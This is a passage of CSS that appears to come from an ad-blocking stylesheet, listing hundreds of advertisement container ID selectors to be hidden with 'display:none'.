PageLeaderAd,#PreRollAd,#RelevantAds,#RgtAd1,#RightAd,#RightBottom300x250AD,#RightNavTopAdSpot,#RightSponsoredAd,#SectionAd300-250,#SectionSponsorAd,#SideAdMpu,#SidebarAdContainer,#SkyAd,#SpecialAds,#SponsoredAd,#SponsoredLinks,#TL_footer_advertisement,#TOP_ADROW,#TOP_RIGHT_BOXAD,#Tadspacefoot,#Tadspacehead,#Tadspacemrec,#TextLinkAds,#ThreadAd,#Top468x60AD,#TopAd,#TopAdBox,#TopAdContainer,#TopAdDiv,#TopAdPos,#TopBannerAd,#VM-MPU-adspace,#VM-footer-adspace,#VM-header-adspace,#VM-header-adwrap,#XEadLeaderboard,#XEadSkyscraper,#YahooAdParentContainer,#_ads,#abHeaderAdStreamer,#about_adsbottom,#abovepostads,#ad-1000x90-1,#ad-120x600-sidebar,#ad-120x60Div,#ad-160x600,#ad-160x600-sidebar,#ad-250,#ad-250x300,#ad-300,#ad-300x250,#ad-300x250-1,#ad-300x250-sidebar,#ad-300x250Div,#ad-300x60-1,#ad-376x280,#ad-728,#ad-728x90,#ad-728x90-1,#ad-728x90-leaderboard-top,#ad-728x90-top0,#ad-ads,#ad-article,#ad-banner,#ad-banner-1,#ad-bigbox,#ad-billboard-bottom,#ad-block-125,#ad-bottom,#ad-bottom-wrapper,#ad-box,#ad-box-first,#ad-box-second,#ad-boxes,#ad-bs,#ad-buttons,#ad-colB-1,#ad-column,#ad-container,#ad-content,#ad-contentad,#ad-first-post,#ad-flex-first,#ad-footer,#ad-footprint-160x600,#ad-frame,#ad-front-footer,#ad-front-sponsoredlinks,#ad-fullbanner2,#ad-globalleaderboard,#ad-halfpage,#ad-header,#ad-header-728x90,#ad-horizontal-header,#ad-img,#ad-inner,#ad-label,#ad-leaderboard,#ad-leaderboard-1-container,#ad-leaderboard-bottom,#ad-leaderboard-container,#ad-leaderboard-spot,#ad-leaderboard-top,#ad-left,#ad-left-sidebar-ad-1,#ad-left-sidebar-ad-2,#ad-left-sidebar-ad-3,#ad-links-content,#ad-list-row,#ad-lrec,#ad-medium,#ad-medium-rectangle,#ad-medrec,#ad-middlethree,#ad-middletwo,#ad-module,#ad-mpu,#ad-mpu1-spot,#ad-mpu2,#ad-mpu2-spot,#ad-north,#ad-one,#ad-placard,#ad-placeholder,#ad-rectangle,#ad-right,#ad-right-sidebar-ad-1,#ad-right-sidebar-ad-2,#ad-righttop,#ad-row,#ad-side,#ad-side-text,#ad-sidebar,#ad-sky,#ad-skyscraper,#ad-slot-right,#ad-slug-wrapper,#ad-small-banner,#ad-space,#ad-special,#ad-splash,#ad-sponsors,#ad-spot,#ad-squares,#ad-story-bottom-out,#ad-story-right,#ad-target,#ad-target-Leaderbord,#ad-teaser,#ad-text,#ad-top,#ad-top-banner,#ad-top-text-low,#ad-top-wrap,#ad-tower,#ad-trailerboard-spot,#ad-two,#ad-typ1,#ad-unit,#ad-wrap,#ad-wrap-right,#ad-wrapper,#ad-wrapper1,#ad-yahoo-simple,#ad-zone-1,#ad-zone-2,#ad-zone-inline,#ad01,#ad02,#ad1006,#ad11,#ad125BL,#ad125BR,#ad125TL,#ad125TR,#ad125x125,#ad160x600,#ad160x600right,#ad1Sp,#ad2Sp,#ad300,#ad300-250,#ad300X250,#ad300_x_250,#ad300x100Middle,#ad300x150,#ad300x250,#ad300x250Module,#ad300x60,#ad300x600,#ad300x600_callout,#ad336,#ad336x280,#ad375x85,#ad468,#ad468x60,#ad468x60_top,#ad526x250,#ad600,#ad728,#ad728Mid,#ad728Top,#ad728Wrapper,#ad728top,#ad728x90,#ad728x90_1,#ad90,#adBadges,#adBanner,#adBanner10,#adBanner120x600,#adBanner160x600,#adBanner2,#adBanner3,#adBanner336x280,#adBanner4,#adBanner728,#adBanner9,#adBannerTable,#adBannerTop,#adBar,#adBelt,#adBlock125,#adBlockTop,#adBlocks,#adBottbanner,#adBox,#adBox11,#adBox16,#adBox350,#adBox390,#adCirc300X200,#adCirc_620_100,#adCol,#adColumn,#adCompanionSubstitute,#adComponentWrapper,#adContainer,#adContainer_1,#adContainer_2,#adContainer_3,#adDiv,#adDiv300,#adDiv728,#adFiller,#adFps,#adFtofrs,#adGallery,#adGoogleText,#adGroup1,#adHeader,#adHeaderTop,#adIsland,#adLB,#adLabel,#adLayer,#adLeader,#adLeaderTop,#adLeaderboard,#adMPU,#adMediumRectangle,#adMiddle0Frontpage,#adMiniPremiere,#adMonster1,#adOuter,#adPlaceHolderRight,#adPlacer,#adPosOne,#adRight,#adRight2,#adSPLITCOLUMNTOPRIGHT,#adSenseModule,#adSenseWrapper,#adServer_marginal,#adShortTower,#adSidebar,#adSidebarSq,#adSky,#adSkyscraper,#adSlider,#adSpace,#adSpace0,#adSpace1,#adSpace10,#adSpace11,#adSpace12,#adSpace13,#adSpace14,#adSpace15,#adSpace16,#adSpace17,#adSpace18,#adSpace19,#adSpace2,#adSpace20,#adSpace21,#adSpace22,#adSpace23,#adSpace24,#adSpace25,#adSpace3,#adSpace300_ifrMain,#adSpace4,#adSpace5,#adSpace6,#adSpace7,#adSpace8,#adSpace9,#adSpace_footer,#adSpace_right,#adSpace_top,#adSpacer,#adSpecial,#adSplotlightEm,#adSpot-Leader,#adSpot-banner,#adSpot-island,#adSpot-mrec1,#adSpot-sponsoredlinks,#adSpot-textbox1,#adSpot-widestrip,#adSpotAdvertorial,#adSpotIsland,#adSpotSponsoredLinks,#adSquare,#adStaticA,#adStrip,#adSuperAd,#adSuperPremiere,#adSuperSkyscraper,#adSuperbanner,#adTableCell,#adTag1,#adTag2,#adText,#adTextCustom,#adTextLink,#adText_container,#adTile,#adTop,#adTopContent,#adTopbanner,#adTopboxright,#adTower,#adUnit,#adWrapper,#adZoneTop,#ad_1,#ad_130x250_inhouse,#ad_160x160,#ad_160x600,#ad_190x90,#ad_2,#ad_3,#ad_300,#ad_300_250,#ad_300_250_1,#ad_300a,#ad_300b,#ad_300c,#ad_300x100_m_c,#ad_300x250,#ad_300x250_content_column,#ad_300x250_m_c,#ad_300x250m,#ad_300x90,#ad_4,#ad_468_60,#ad_468x60,#ad_5,#ad_728_foot,#ad_728x90,#ad_728x90_container,#ad_940,#ad_984,#ad_A,#ad_B,#ad_Banner,#ad_C,#ad_C2,#ad_D,#ad_E,#ad_F,#ad_G,#ad_H,#ad_I,#ad_J,#ad_K,#ad_L,#ad_M,#ad_N,#ad_O,#ad_P,#ad_YieldManager-300x250,#ad_YieldManager-728x90,#ad_adsense,#ad_after_navbar,#ad_anchor,#ad_area,#ad_banner,#ad_bannerManage_1,#ad_banner_top,#ad_banners,#ad_bar,#ad_bellow_post,#ad_bigsize_wrapper,#ad_block_1,#ad_block_2,#ad_bottom,#ad_box,#ad_box_colspan,#ad_box_top,#ad_branding,#ad_bs_area,#ad_buttons,#ad_center_monster,#ad_circ300x250,#ad_cna2,#ad_cont,#ad_container,#ad_container_0,#ad_container_marginal,#ad_container_side,#ad_container_sidebar,#ad_container_top,#ad_content_top,#ad_content_wrap,#ad_feature,#ad_firstpost,#ad_footer,#ad_frame,#ad_front_three,#ad_fullbanner,#ad_gallery,#ad_global_header,#ad_h3,#ad_haha_1,#ad_haha_4,#ad_halfpage,#ad_head,#ad_header,#ad_holder,#ad_horizontal,#ad_horseshoe_left,#ad_horseshoe_right,#ad_horseshoe_spacer,#ad_horseshoe_top,#ad_hotpots,#ad_in_arti,#ad_island,#ad_label,#ad_large_rectangular,#ad_lastpost,#ad_layer,#ad_layer2,#ad_leader,#ad_leaderBoard,#ad_leaderboard,#ad_leaderboard728x90,#ad_leaderboard_top,#ad_left,#ad_lnk,#ad_lrec,#ad_lwr_square,#ad_main,#ad_medium_rectangle,#ad_medium_rectangular,#ad_mediumrectangle,#ad_menu_header,#ad_message,#ad_middle,#ad_most_pop_234x60_req_wrapper,#ad_mpu,#ad_mpu300x250,#ad_mpuav,#ad_mrcontent,#ad_newsletter,#ad_overlay,#ad_place,#ad_play_300,#ad_rect,#ad_rect_body,#ad_rect_bottom,#ad_rectangle,#ad_rectangle_medium,#ad_related_links_div,#ad_related_links_div_program,#ad_replace_div_0,#ad_replace_div_1,#ad_report_leaderboard,#ad_report_rectangle,#ad_results,#ad_right,#ad_right_main,#ad_ros_tower,#ad_rr_1,#ad_script_head,#ad_sec,#ad_sec_div,#ad_sgd,#ad_sidebar,#ad_sidebar1,#ad_sidebar2,#ad_sidebar3,#ad_sky,#ad_skyscraper,#ad_skyscraper160x600,#ad_skyscraper_text,#ad_slot_leaderboard,#ad_slot_livesky,#ad_slot_sky_top,#ad_space,#ad_square,#ad_ss,#ad_table,#ad_term_bottom_place,#ad_text:not(textarea),#ad_thread_first_post_content,#ad_top,#ad_top_holder,#ad_tp_banner_1,#ad_tp_banner_2,#ad_txt,#ad_unit,#ad_vertical,#ad_wide,#ad_wide_box,#ad_widget,#ad_window,#ad_wrap,#ad_wrapper,#adaptvcompanion,#adbForum,#adbanner,#adbar,#adbig,#adbnr,#adboard,#adbody,#adbottom,#adbox,#adbox1,#adbox2,#adbutton,#adclear,#adcode,#adcode1,#adcode2,#adcode3,#adcode4,#adcolumnwrapper,#adcontainer,#adcontainer1,#adcontainerRight,#adcontainsm,#adcontent,#adcontent1,#adcontrolPushSite,#add_ciao2,#addbottomleft,#addiv-bottom,#addiv-top,#adfooter,#adfooter_728x90,#adframe:not(frameset),#adhead,#adhead_g,#adheader,#adhome,#adiframe1_iframe,#adiframe2_iframe,#adiframe3_iframe,#adimg,#adition_content_ad,#adlabel,#adlabelFooter,#adlayer,#adlayerContainer,#adlayer_back,#adlayerad,#adleaderboard,#adleaderboard_flex,#adleaderboardb,#adleaderboardb_flex,#adleft,#adlinks,#adlinkws,#adlrec,#admanager_leaderboard,#admid,#admiddle3center,#admiddle3left,#adposition,#adposition-C,#adposition-FPMM,#adposition1,#adposition2,#adposition3,#adposition4,#adrectangle,#adrectanglea,#adrectanglea_flex,#adrectangleb,#adrectangleb_flex,#adrig,#adright,#adright2,#adrighthome,#ads-250,#ads-468,#ads-area,#ads-block,#ads-bot,#ads-bottom,#ads-col,#ads-dell,#ads-footer,#ads-footer-inner,#ads-horizontal,#ads-indextext,#ads-leaderboard1,#ads-lrec,#ads-main,#ads-menu,#ads-middle,#ads-prices,#ads-rhs,#ads-right,#ads-sponsored-boxes,#ads-top,#ads-vers7,#ads-wrapper,#ads120,#ads125,#ads160left,#ads300,#ads300-250,#ads300Bottom,#ads300Top,#ads315,#ads336x280,#ads728,#ads728bottom,#ads728top,#ads790,#adsBox-460_left,#adsBox-dynamic-right,#adsBoxResultsPage,#adsContent,#adsDisplay,#adsDiv1,#adsDiv2,#adsDiv3,#adsDiv4,#adsDiv5,#adsDiv6,#adsDiv7,#adsHeader,#adsID,#ads_160,#ads_300,#ads_728,#ads_banner,#ads_belowforumlist,#ads_belownav,#ads_bottom,#ads_bottom_inner,#ads_bottom_outer,#ads_box,#ads_button,#ads_catDiv,#ads_container,#ads_footer,#ads_fullsize,#ads_halfsize,#ads_header,#ads_html1,#ads_html2,#ads_inner,#ads_lb,#ads_medrect,#ads_notice,#ads_right,#ads_right_sidebar,#ads_sidebar_roadblock,#ads_space,#ads_text,#ads_top,#ads_topbanner,#ads_watch_top_square,#ads_zone27,#adsbottom,#adsbox,#adsbox-left,#adsbox-right,#adscolumn,#adsd_contentad_r1,#adsd_contentad_r2,#adsd_contentad_r3,#adsd_topbanner,#adsd_txt_sky,#adsdiv,#adsection,#adsense,#adsense-2,#adsense-header,#adsense-new,#adsense-tag,#adsense-text,#adsense03,#adsense04,#adsense05,#adsense1,#adsenseLeft,#adsenseOne,#adsenseWrap,#adsense_article_left,#adsense_block,#adsense_box,#adsense_box_video,#adsense_inline,#adsense_leaderboard,#adsense_overlay,#adsense_placeholder_2,#adsenseheader,#adsensetopplay,#adsensewidget-3,#adserv,#adshometop,#adsimage,#adskinlink,#adsky,#adskyscraper,#adslider,#adslot,#adsmiddle,#adsonar,#adspace,#adspace-1,#adspace-300x250,#adspace-leaderboard-top,#adspace300x250,#adspaceBox,#adspaceBox300,#adspace_header,#adspace_leaderboard,#adspacer,#adsponsorImg,#adspot,#adspot-1,#adspot-149x170,#adspot-1x4,#adspot-2,#adspot-295x60,#adspot-2a,#adspot-2b,#adspot-300x110-pos-1,#adspot-300x125,#adspot-300x250-pos-1,#adspot-300x250-pos-2,#adspot-468x60-pos-2,#adspot-a,#adspot300x250,#adspot_220x90,#adspot_300x250,#adspot_468x60,#adspot_728x90,#adsquare,#adsright,#adstop,#adtab,#adtag_right_side,#adtagfooter,#adtagheader,#adtagrightcol,#adtaily-widget-light,#adtech_0,#adtech_1,#adtech_2,#adtech_3,#adtech_googleslot_03c,#adtech_takeover,#adtext,#adtop,#adtophp,#adtxt,#adv-300,#adv-leaderboard,#adv-left,#adv-masthead,#adv-middle,#adv-mpux,#adv-x36,#adv-x37,#adv-x38,#adv-x39,#adv-x40,#adv1,#adv300bottom { display:none !important; } #adv300top,#adv728,#adv_300,#adv_728,#adv_border,#adv_google_300,#adv_google_728,#adv_halfpage,#adv_halfpage_title,#adv_leaderboard,#adv_sky,#adv_top_banner_wrapper,#adver1,#adver2,#adver3,#adver4,#adver5,#adver6,#adver7,#advert-1,#advert-120,#advert-boomer,#advert-display,#advert-header,#advert-leaderboard,#advert-links-bottom,#advert-skyscraper,#advert-top,#advert1,#advertBanner,#advertContainer,#advertDB,#advertRight,#advertSection,#advert_125x125,#advert_250x250,#advert_box,#advert_home01,#advert_leaderboard,#advert_lrec_format,#advert_mid,#advert_mpu,#advert_mpu_1,#advert_right_skyscraper,#advert_sky,#advertbox,#advertbox2,#advertbox3,#advertbox4,#adverthome,#advertise,#advertise-here,#advertise-here-sidebar,#advertise-now,#advertise1,#advertiseHere,#advertisement1,#advertisement160x600,#advertisement3,#advertisement728x90,#advertisementHorizontal,#advertisementLigatus,#advertisementPrio2,#advertisementRight,#advertisementRightcolumn0,#advertisementRightcolumn1,#advertisementsarticle,#advertiser-container,#advertiserLinks,#advertisers,#advertising,#advertising-banner,#advertising-caption,#advertising-container,#advertising-control,#advertising-skyscraper,#advertising-top,#advertising2,#advertisingModule160x600,#advertisingModule728x90,#advertisingTopWrapper,#advertising_btm,#advertising_contentad,#advertising_horiz_cont,#advertisment,#advertismentElementInUniversalbox,#advertorial,#advertorial_red_listblock,#adverts,#adverts-top-container,#adverts-top-left,#adverts-top-middle,#adverts-top-right,#advertsingle,#advertspace,#advheader,#advsingle,#advt,#advtext,#advtop,#adwhitepaperwidget,#adwin_rec,#adwith,#adwords-4-container,#adwrapper,#adxBigAd,#adxMiddle5,#adxSponLink,#adxSponLinkA,#adxtop,#adxtop2,#adzbanner,#adzerk,#adzerk1,#adzerk2,#adzone,#adzoneBANNER,#adzoneheader,#afc-container,#affinityBannerAd,#after-content-ads,#after-header-ad-left,#after-header-ad-right,#after-header-ads,#agi-ad300x250,#agi-ad300x250overlay,#agi-sponsored,#alert_ads,#anchorAd,#annoying_ad,#ap_adframe,#ap_cu_overlay,#ap_cu_wrapper,#apiBackgroundAd,#apiTopAdWrap,#apmNADiv,#apolload,#araHealthSponsorAd,#area-adcenter,#area1ads,#article-ad,#article-ad-container,#article-box-ad,#articleAdReplacement,#articleLeftAdColumn,#articleSideAd,#article_ad,#article_ad_container,#article_box_ad,#articlead1,#articlead2,#asideads,#asinglead,#atlasAdDivGame,#awds-nt1-ad,#babAdTop,#banner-300x250,#banner-ad,#banner-ad-container,#banner-ads,#banner250x250,#banner300x250,#banner468x60,#banner728x90,#bannerAd,#bannerAdTop,#bannerAdWrapper,#bannerAd_ctr,#bannerAd_rdr,#banner_160x600,#banner_300_250,#banner_ad,#banner_ad_footer,#banner_ad_module,#banner_admicro,#banner_ads,#banner_advertisement,#banner_content_ad,#banner_topad,#bannerad,#bannerad2,#baseAdvertising,#basket-adContainer,#bbccom_mpu,#bbo_ad1,#bg-footer-ads,#bg-footer-ads2,#bg_YieldManager-160x600,#bg_YieldManager-300x250,#bg_YieldManager-728x90,#bigAd,#bigBoxAd,#bigad300outer,#bigadbox,#bigadframe,#bigadspot,#billboard_ad,#block-ad_cube-1,#block-openads-0,#block-openads-1,#block-openads-2,#block-openads-3,#block-openads-4,#block-openads-5,#block-spti_ga-spti_ga_adwords,#block-thewrap_ads_250x300-0,#block_advert,#block_advertisement,#blog-ad,#blog_ad_content,#blog_ad_opa,#blog_ad_right,#blog_ad_top,#blox-big-ad,#blox-big-ad-bottom,#blox-big-ad-top,#blox-halfpage-ad,#blox-tile-ad,#blox-tower-ad,#body_728_ad,#book-ad,#botad,#bott_ad2,#bott_ad2_300,#bottom-ad,#bottom-ad-container,#bottom-ad-tray,#bottom-ad-wrapper,#bottom-ads,#bottomAd,#bottomAdCCBucket,#bottomAdContainer,#bottomAdSense,#bottomAdSenseDiv,#bottomAds,#bottomAdvBox,#bottomContentAd,#bottomRightAd,#bottomRightAdSpace,#bottom_ad,#bottom_ad_area,#bottom_ad_unit,#bottom_ads,#bottom_banner_ad,#bottom_overture,#bottom_sponsor_ads,#bottom_sponsored_links,#bottom_text_ad,#bottomad,#bottomads,#bottomadsense,#bottomadwrapper,#bottomleaderboardad,#box-ad-section,#box-ads-small-1,#box-ads-small-2,#box-content-ad,#box-googleadsense-1,#box-googleadsense-r,#box1ad,#boxAd300,#boxAdContainer,#boxAdvert,#box_ad,#box_advertisment,#box_mod_googleadsense,#boxad1,#boxad2,#boxad3,#boxad4,#boxad5,#boxads,#bpAd,#bps-header-ad-container,#btnAds,#btnads,#btr_horiz_ad,#burn_header_ad,#button-ads-horizontal,#button-ads-vertical,#buttonAdWrapper1,#buttonAdWrapper2,#buttonAds,#buttonAdsContainer,#button_ad_container,#button_ad_wrap,#button_ads,#buttonad,#buy-sell-ads,#c4ad-Middle1,#c_ad_sb,#c_ad_sky,#caAdLarger,#catad,#category-ad,#cellAd,#channel_ad,#channel_ads,#ciHomeRHSAdslot,#circ_ad,#closeable-ad,#cmn_ad_box,#cmn_toolbar_ad,#cnnAboveFoldBelowAd,#cnnRR336ad,#cnnSponsoredPods,#cnnTopAd,#cnnVPAd,#col3_advertising,#colAd,#colRightAd,#collapseobj_adsection,#column4-google-ads,#comments-ad-container,#commercial_ads,#common_right_ad_wrapper,#common_right_lower_ad_wrapper,#common_right_lower_adspace,#common_right_lower_player_ad_wrapper,#common_right_lower_player_adspace,#common_right_player_ad_wrapper,#common_right_player_adspace,#common_right_right_adspace,#common_top_adspace,#comp_AdsLeaderboardTop,#companion-ad,#companionAd,#companionAdDiv,#companionad,#container-righttopads,#container-topleftads,#containerLocalAds,#containerLocalAdsInner,#containerMrecAd,#containerSqAd,#content-ad-header,#content-header-ad,#content-left-ad,#content-right-ad,#contentAd,#contentBoxad,#contentTopAds2,#content_ad,#content_ad_square,#content_ad_top,#content_ads_content,#content_box_300body_sponsoredoffers,#content_box_adright300_google,#content_lower_center_right_ad,#content_mpu,#contentad,#contentad_imtext,#contentad_right,#contentads,#contentinlineAd,#contents_post_ad,#contextad,#contextual-ads,#contextual-ads-block,#contextualad,#coverADS,#coverads,#ctl00_Adspace_Top_Height,#ctl00_BottomAd,#ctl00_ContentMain_BanManAd468_BanManAd,#ctl00_ContentPlaceHolder1_blockAdd_divAdvert,#ctl00_ContentRightColumn_RightColumn_Ad1_BanManAd,#ctl00_ContentRightColumn_RightColumn_Ad2_BanManAd,#ctl00_ContentRightColumn_RightColumn_PremiumAd1_ucBanMan_BanManAd,#ctl00_LHTowerAd,#ctl00_LeftHandAd,#ctl00_MasterHolder_IBanner_adHolder,#ctl00_TopAd,#ctl00_TowerAd,#ctl00_VBanner_adHolder,#ctl00__Content__RepeaterReplies_ctl03__AdReply,#ctl00_abot_bb,#ctl00_adFooter,#ctl00_advert_LargeMPU_div_AdPlaceHolder,#ctl00_atop_bt,#ctl00_cphMain_hlAd1,#ctl00_cphMain_hlAd2,#ctl00_cphMain_hlAd3,#ctl00_ctl00_MainPlaceHolder_itvAdSkyscraper,#ctl00_ctl00_ctl00_Main_Main_PlaceHolderGoogleTopBanner_MPTopBannerAd,#ctl00_ctl00_ctl00_Main_Main_SideBar_MPSideAd,#ctl00_dlTilesAds,#ctl00_m_skinTracker_m_adLBL,#ctl00_phCrackerMain_ucAffiliateAdvertDisplayMiddle_pnlAffiliateAdvert,#ctl00_phCrackerMain_ucAffiliateAdvertDisplayRight_pnlAffiliateAdvert,#ctl00_topAd,#ctrlsponsored,#cubeAd,#cube_ads,#cube_ads_inner,#cubead,#cubead-2,#currencies-sponsored-by,#custom-advert-leadboard-spacer,#dAdverts,#dItemBox_ads,#dart_160x600,#dc-display-right-ad-1,#dcadSpot-Leader,#dcadSpot-LeaderFooter,#dcol-sponsored,#defer-adright,#detail_page_vid_topads,#div-gpt-ad-1,#div-gpt-ad-2,#div-gpt-ad-3,#div-gpt-ad-4,#divAd,#divAdBox,#divAdWrapper,#divAdvertisement,#divBottomad1,#divBottomad2,#divDoubleAd,#divLeftAd12,#divLeftRecAd,#divMenuAds,#divWNAdHeader,#divWrapper_Ad,#div_ad_leaderboard,#div_video_ads,#dlads,#dni-header-ad,#dnn_adLeaderBoard2008,#dnn_ad_banner,#download_ads,#dp_ads1,#ds-mpu,#ds_ad_north_leaderboard,#editorsmpu,#em_ad_superbanner,#embedded-ad,#evotopTen_advert,#ex-ligatus,#exads,#extra-search-ads,#fb_adbox,#fb_rightadpanel,#featAds,#featuread,#featured-advertisements,#featuredAdContainer2,#featuredAds,#featured_ad_links,#feed_links_ad_container,#file_sponsored_link,#first-300-ad,#first-adlayer,#first_ad_unit,#firstad,#flAdData6,#fl_hdrAd,#flash_ads_1,#flexiad,#floatingAd,#floating_ad_container,#foot-ad-1,#footad,#footer-ad,#footer-ads,#footer-advert,#footer-adverts,#footer-sponsored,#footerAd,#footerAdDiv,#footerAds,#footerAdvertisement,#footerAdverts,#footer_ad,#footer_ad_01,#footer_ad_block,#footer_ad_container,#footer_ad_modules,#footer_ads,#footer_adspace,#footer_text_ad,#footerad,#footerads,#footeradsbox,#forum_top_ad,#four_ads,#fpad1,#fpad2,#fpv_companionad,#fr_ad_center,#frame_admain,#frnAdSky,#frnBannerAd,#frnContentAd,#front_ad728,#front_advert,#front_mpu,#ft-ad,#ft-ad-1,#ft-ad-container,#ft_mpu,#fullsizebanner_468x60,#fusionad,#fw-advertisement,#g_ad,#g_adsense,#ga_300x250,#galleries-tower-ad,#gallery-ad,#gallery-ad-m0,#gallery-random-ad,#gallery_ads,#game-info-ad,#gamead,#gameads,#gasense,#gglads,#global_header_ad_area,#gm-ad-lrec,#gmi-ResourcePageAd,#gmi-ResourcePageLowerAd,#goad1,#goads,#gooadtop,#google-ad,#google-ad-art,#google-ad-table-right,#google-ad-tower,#google-ads,#google-ads-bottom,#google-ads-header,#google-ads-left-side,#google-adsense-mpusize,#googleAd,#googleAdArea,#googleAds,#googleAdsSml,#googleAdsense,#googleAdsenseBanner,#googleAdsenseBannerBlog,#googleAdwordsModule,#googleAfcContainer,#googleSearchAds,#googleShoppingAdsRight,#googleShoppingAdsTop,#googleSubAds,#google_ad,#google_ad_container,#google_ad_inline,#google_ad_test,#google_ads,#google_ads_aCol,#google_ads_frame1,#google_ads_frame1_anchor,#google_ads_frame2,#google_ads_frame2_anchor,#google_ads_frame3,#google_ads_frame3_anchor,#google_ads_test,#google_ads_top,#google_adsense_home_468x60_1,#googlead,#googlead-sidebar-middle,#googlead-sidebar-top,#googlead2,#googleadbox,#googleads,#googleads_mpu_injection,#googleadsense,#googlesponsor,#gpt-ad-halfpage,#gpt-ad-rectangle1,#gpt-ad-rectangle2,#gpt-ad-skyscraper,#gpt-ad-story_rectangle3,#grid_ad,#gsyadrectangleload,#gsyadrightload,#gsyadtop,#gsyadtopload,#gtopadvts,#half-page-ad,#halfPageAd,#halfe-page-ad-box,#hd-ads,#hd-banner-ad,#hdtv_ad_ss,#head-ad,#head-ad-1,#head-banner468,#headAd,#head_ad,#head_advert,#headad,#header-ad,#header-ad-left,#header-ad-rectangle-container,#header-ad-right,#header-ad2010,#header-ads,#header-adspace,#header-advert,#header-advertisement,#header-advertising,#header-adverts,#header-banner-ad,#headerAd,#headerAdBackground,#headerAdContainer,#headerAdWrap,#headerAds,#headerAdsWrapper,#headerTopAd,#header_ad,#header_ad_728_90,#header_ad_container,#header_adcode,#header_ads,#header_advertisement_top,#header_flag_ad,#header_leaderboard_ad_container,#header_publicidad,#headerad,#headeradbox,#headerads,#headeradsbox,#headeradvertholder,#headeradwrap,#headline_ad,#headlinesAdBlock,#hiddenadAC,#hideads,#hl-sponsored-results,#hly_ad_side_bar_tower_left,#hly_inner_page_google_ad,#home-advert-module,#home-rectangle-ad,#home-top-ads,#homeMPU,#homeTopRightAd,#home_ad,#home_bottom_ad,#home_contentad,#home_feature_ad,#home_lower_center_right_ad,#home_mpu,#home_spensoredlinks,#homead,#homepage-ad,#homepageAdsTop,#homepageFooterAd,#homepage_right_ad,#homepage_right_ad_container,#homepage_top_ads,#hometop_234x60ad,#hor_ad,#horizad,#horizontal-banner-ad,#horizontal_ad,#horizontal_ad_top,#horizontalads,#hot-deals-ad,#houseAd,#hp-header-ad,#hp-mpu,#hp-right-ad,#hp-store-ad,#hpV2_300x250Ad,#hpV2_googAds,#hp_ad300x250,#ibt_local_ad728,#icePage_SearchLinks_AdRightDiv,#icePage_SearchLinks_DownloadToolbarAdRightDiv,#icePage_SearchResults_ads0_SponsoredLink,#icePage_SearchResults_ads1_SponsoredLink,#icePage_SearchResults_ads2_SponsoredLink,#icePage_SearchResults_ads3_SponsoredLink,#icePage_SearchResults_ads4_SponsoredLink,#idSponsoredresultend,#idSponsoredresultstart,#iframeRightAd,#iframeTopAd,#imu_ad_module,#in_serp_ad,#inadspace,#indexad,#inline-story-ad,#inlineAd,#inlinead,#inlinegoogleads,#inlist-ad-block,#inner-advert-row,#inner-top-ads,#innerpage-ad,#inside-page-ad,#insider_ad_wrapper,#instoryad,#instoryadtext,#instoryadwrap,#int-ad,#interstitial_ad_wrapper,#iqadtile8,#islandAd,#j_ad,#ji_medShowAdBox,#jmp-ad-buttons,#joead,#joead2,#js_adsense,#ka_adRightSkyscraperWide,#ka_samplead,#kaufDA-widget,#kdz_ad1,#kdz_ad2,#keyadvertcontainer,#landing-adserver,#lapho-top-ad-1,#largead,#lateAd,#layerAds_layerDiv,#layerTLDADSERV,#layer_ad_content,#layer_ad_main,#layerad,#leader-board-ad,#leaderAd,#leaderAdContainer,#leader_ad,#leader_board_ad,#leaderad,#leaderad_section,#leaderboard-ad,#leaderboard-bottom-ad,#leaderboardAd,#leaderboard_ad,#leaderboard_ad_gam,#left-ad-1,#left-ad-2,#left-ad-col,#left-ad-skin,#left-bottom-ad,#left-lower-adverts,#left-lower-adverts-container,#leftAdContainer,#leftAd_rdr,#leftAdvert,#leftSectionAd300-100,#left_ad,#left_adspace,#leftad,#leftads,#leftcolAd,#lg-banner-ad,#ligatus,#linkAds,#linkads,#live-ad,#localAds,#logoAd,#longAdSpace,#long_advertisement,#lowerAdvertisementImg,#lower_ad,#lowerads,#lowerthirdad,#lowertop-adverts,#lowertop-adverts-container,#lpAdPanel,#lrecad,#lsadvert-left_menu_1,#lsadvert-left_menu_2,#lsadvert-top,#mBannerAd,#main-ad,#main-ad160x600,#main-ad160x600-img,#main-ad728x90,#main-advert1,#main-advert2,#main-advert3,#main-bottom-ad,#main-tj-ad,#mainAd,#mainAdUnit,#mainAdvert,#mainAdvertismentP,#mainHeaderAdvertisment,#main_ad,#main_rec_ad,#main_top_ad_container,#marketing-promo,#mastAd,#mastAdvert,#mastad,#mastercardAd,#masthead_ad,#masthead_topad,#medRecAd,#media_ad,#mediaplayer_adburner,#mediumAdvertisement,#medrectad,#menuAds,#menubanner-ad-content,#mi_story_assets_ad,#mid-ad300x250,#mid-table-ad,#midRightTextAds,#mid_ad_div,#mid_ad_title,#mid_mpu,#midadd,#midadspace,#middle-ad,#middle_ad,#middle_body_advertising,#middlead,#middleads,#midrect_ad,#midstrip_ad,#mini-ad,#mochila-column-right-ad-300x250,#mochila-column-right-ad-300x250-1,#module-google_ads,#module_ad,#module_box_ad,#module_sky_scraper,#monsterAd,#moogleAd,#moreads,#most_popular_ad,#motionAd,#mpu-advert,#mpu-cont,#mpu300250,#mpuAd,#mpuDiv,#mpuSlot,#mpuWrapper,#mpuWrapperAd,#mpu_banner,#mpu_firstpost,#mpu_holder,#mpu_text_ad,#mpuad,#mpubox,#mr_banner_topad,#mrecAdContainer,#msAds,#ms_ad,#msad,#multiLinkAdContainer,#multi_ad,#my-ads,#myads_HeaderButton,#n_sponsor_ads,#namecom_ad_hosting_main,#narrow-ad,#narrow_ad_unit,#natadad300x250,#national_microlink_ads,#nationalad,#navi_banner_ad_780,#nba160PromoAd,#nba300Ad,#nbaGI300ad,#nbaHouseAnd600Ad,#nbaLeft600Ad,#nbaMidAds,#nbaVid300Ad,#nbcAd300x250,#new_topad,#newads,#news_advertorial_content,#news_advertorial_top,#ng_rtcol_ad,#noresults_ad_container,#noresultsads,#northad,#northbanner-advert,#northbanner-advert-container,#ns_ad1,#ns_ad2,#ns_ad3,#oanda_ads,#onespot-ads,#online_ad,#ovadsense,#p-googleadsense,#page-header-ad,#page-top-ad,#pageAds,#pageAdsDiv,#pageBannerAd,#page_ad,#page_content_top_ad,#pagelet_adbox,#pagelet_netego_ads,#pagelet_search_ads2,#panelAd,#pb_report_ad,#pcworldAdBottom,#pcworldAdTop,#pinball_ad,#player-below-advert,#player_ad,#player_ads,#pmad-in1,#pod-ad-video-page,#populate_ad_bottom,#populate_ad_left,#popup_domination_lightbox_wrapper,#portlet-advertisement-left,#portlet-advertisement-right,#post-promo-ad,